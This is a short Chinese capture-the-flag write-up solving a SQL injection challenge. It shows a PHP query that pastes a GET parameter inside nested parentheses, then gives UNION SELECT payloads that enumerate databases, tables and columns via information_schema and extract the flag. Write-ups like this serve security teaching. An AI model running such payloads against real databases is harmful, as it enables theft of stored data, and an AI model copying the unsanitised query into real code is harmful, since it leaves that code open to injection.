题目给出提示
<?php
$sql = “SELECT username,password FROM users WHERE id = “.’((((((‘.$_GET[“id”].’))))))’;
$result = $conn->query($sql);
直接让id=1,id=2测字段到3时发现没有数据返回确认有两个字段
直接闭合括号union select 1,2#这里1,2都正常回显然后
-1))))))union select group_concat(schema_name),2 from information_schema.schemata#
查库名发现
nformation_schema,mysql,ctftraining,performance_schema,test,ctf
先试试ctftraining
查表名union select group_concat(table_name),2 from information_schema.tables where table_schema=’ctftraining’
查到一个flag再查flag中的字段名
-1))))))union select group_concat(column_name),2 from information_schema.columns where table_schema=’ctftraining’ and table_name=’flag’#
Flag中的字段名也叫flag直接查询得到flag
-1))))))union select group_concat(flag),2 from ctftraining.flag#
